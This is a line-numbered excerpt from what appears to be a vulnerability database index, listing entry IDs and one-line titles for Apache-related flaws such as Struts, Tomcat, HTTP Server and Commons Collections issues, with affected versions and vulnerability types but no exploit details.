12672| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
12673| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
12674| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
12675| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
12676| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
12677| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
12678| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
12679| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
12680| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
12681| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
12682| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
12683| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
12684| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
12685| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
12686| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
12687| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
12688| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
12689| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
12690| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
12691| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
12692| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
12693| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
12694| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
12695| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
12696| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
12697| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
12698| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
12699| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
12700| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
12701| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
12702| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
12703| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
12704| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
12705| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
12706| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
12707| [90263] Apache Archiva Header denial of service
12708| [90262] Apache Archiva Deserialize privilege escalation
12709| [90261] Apache Archiva XML DTD Connection privilege escalation
12710| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
12711| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
12712| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
12713| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
12714| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
12715| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
12716| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
12717| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
12718| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
12719| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
12720| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
12721| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
12722| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
12723| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
12724| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
12725| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
12726| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
12727| [87765] Apache James Server 2.3.2 Command privilege escalation
12728| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
12729| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
12730| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
12731| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
12732| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
12733| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
12734| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
12735| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
12736| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
12737| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
12738| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
12739| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
12740| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
12741| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
12742| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
12743| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
12744| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
12745| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
12746| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
12747| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
12748| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
12749| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
12750| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
12751| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
12752| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
12753| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
12754| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
12755| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
12756| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
12757| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
12758| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
12759| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
12760| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
12761| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
12762| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
12763| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
12764| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
12765| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
12766| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
12767| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
12768| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
12769| [82076] Apache Ranger up to 0.5.1 privilege escalation
12770| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
12771| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
12772| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
12773| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
12774| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
12775| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
12776| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
12777| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
12778| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
12779| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
12780| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
12781| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
12782| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
12783| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
12784| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
12785| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
12786| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
12787| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
12788| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
12789| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
12790| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
12791| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
12792| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
12793| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
12794| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
12795| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
12796| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
12797| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
12798| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
12799| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
12800| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
12801| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
12802| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
12803| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
12804| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
12805| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
12806| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
12807| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
12808| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
12809| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
12810| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
12811| [79791] Cisco Products Apache Commons Collections Library privilege escalation
12812| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
12813| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
12814| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
12815| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
12816| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
12817| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
12818| [78989] Apache Ambari up to 2.1.1 Open Redirect
12819| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
12820| [78987] Apache Ambari up to 2.0.x cross site scripting
12821| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
12822| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
12823| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
12824| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12825| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12826| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12827| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12828| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12829| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
12830| [77406] Apache Flex BlazeDS AMF Message XML External Entity
12831| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
12832| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
12833| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
12834| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
12835| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
12836| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
12837| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
12838| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
12839| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
12840| [76567] Apache Struts 2.3.20 unknown vulnerability
12841| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
12842| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
12843| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
12844| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
12845| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
12846| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
12847| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
12848| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
12849| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
12850| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
12851| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
12852| [74793] Apache Tomcat File Upload denial of service
12853| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
12854| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
12855| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
12856| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
12857| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
12858| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
12859| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
12860| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
12861| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
12862| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
12863| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
12864| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
12865| [74468] Apache Batik up to 1.6 denial of service
12866| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
12867| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
12868| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
12869| [74174] Apache WSS4J up to 2.0.0 privilege escalation
12870| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
12871| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
12872| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
12873| [73731] Apache XML Security unknown vulnerability
12874| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
12875| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
12876| [73593] Apache Traffic Server up to 5.1.0 denial of service
12877| [73511] Apache POI up to 3.10 Deadlock denial of service
12878| [73510] Apache Solr up to 4.3.0 cross site scripting
12879| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
12880| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
12881| [73173] Apache CloudStack Stack-Based unknown vulnerability
12882| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
12883| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
12884| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
12885| [72890] Apache Qpid 0.30 unknown vulnerability
12886| [72887] Apache Hive 0.13.0 File Permission privilege escalation
12887| [72878] Apache Cordova 3.5.0 cross site request forgery
12888| [72877] Apache Cordova 3.5.0 cross site request forgery
12889| [72876] Apache Cordova 3.5.0 cross site request forgery
12890| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
12891| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
12892| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
12893| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
12894| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
12895| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
12896| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
12897| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
12898| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
12899| [71629] Apache Axis2/C spoofing
12900| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
12901| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
12902| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
12903| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
12904| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
12905| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
12906| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
12907| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
12908| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
12909| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
12910| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
12911| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
12912| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
12913| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
12914| [70809] Apache POI up to 3.11 Crash denial of service
12915| [70808] Apache POI up to 3.10 unknown vulnerability
12916| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
12917| [70749] Apache Axis up to 1.4 getCN spoofing
12918| [70701] Apache Traffic Server up to 3.3.5 denial of service
12919| [70700] Apache OFBiz up to 12.04.03 cross site scripting
12920| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
12921| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
12922| [70661] Apache Subversion up to 1.6.17 denial of service
12923| [70660] Apache Subversion up to 1.6.17 spoofing
12924| [70659] Apache Subversion up to 1.6.17 spoofing
12925| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
12926| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
12927| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
12928| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
12929| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
12930| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
12931| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
12932| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
12933| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
12934| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
12935| [69846] Apache HBase up to 0.94.8 information disclosure
12936| [69783] Apache CouchDB up to 1.2.0 memory corruption
12937| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
12938| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
12939| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
12940| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
12941| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
12942| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
12943| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
12944| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
12945| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
12946| [69431] Apache Archiva up to 1.3.6 cross site scripting
12947| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
12948| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
12949| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
12950| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
12951| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
12952| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
12953| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
12954| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
12955| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
12956| [66739] Apache Camel up to 2.12.2 unknown vulnerability
12957| [66738] Apache Camel up to 2.12.2 unknown vulnerability
12958| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
12959| [66695] Apache CouchDB up to 1.2.0 cross site scripting
12960| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
12961| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
12962| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
12963| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
12964| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
12965| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
12966| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
12967| [66356] Apache Wicket up to 6.8.0 information disclosure
12968| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
12969| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
12970| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
12971| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
12972| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
12973| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
12974| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
12975| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
12976| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
12977| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
12978| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
12979| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
12980| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
12981| [65668] Apache Solr 4.0.0 Updater denial of service
12982| [65665] Apache Solr up to 4.3.0 denial of service
12983| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
12984| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
12985| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
12986| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
12987| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
12988| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
12989| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
12990| [65410] Apache Struts 2.3.15.3 cross site scripting
12991| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
12992| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
12993| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
12994| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
12995| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
12996| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
12997| [65340] Apache Shindig 2.5.0 information disclosure
12998| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
12999| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
13000| [10826] Apache Struts 2 File privilege escalation
13001| [65204] Apache Camel up to 2.10.1 unknown vulnerability
13002| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
13003| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
13004| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
13005| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
13006| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
13007| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
13008| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
13009| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
13010| [64722] Apache XML Security for C++ Heap-based memory corruption
13011| [64719] Apache XML Security for C++ Heap-based memory corruption
13012| [64718] Apache XML Security for C++ verify denial of service
13013| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
13014| [64716] Apache XML Security for C++ spoofing
13015| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
13016| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
13017| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
13018| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
13019| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
13020| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
13021| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
13022| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
13023| [64485] Apache Struts up to 2.2.3.0 privilege escalation
13024| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
13025| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
13026| [64467] Apache Geronimo 3.0 memory corruption
13027| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
13028| [64457] Apache Struts up to 2.2.3.0 cross site scripting
13029| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
13030| [9184] Apache Qpid up to 0.20 SSL misconfiguration
13031| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
13032| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
13033| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
13034| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
13035| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
13036| [8873] Apache Struts 2.3.14 privilege escalation
13037| [8872] Apache Struts 2.3.14 privilege escalation
13038| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
13039| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
13040| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
13041| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
13042| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
13043| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
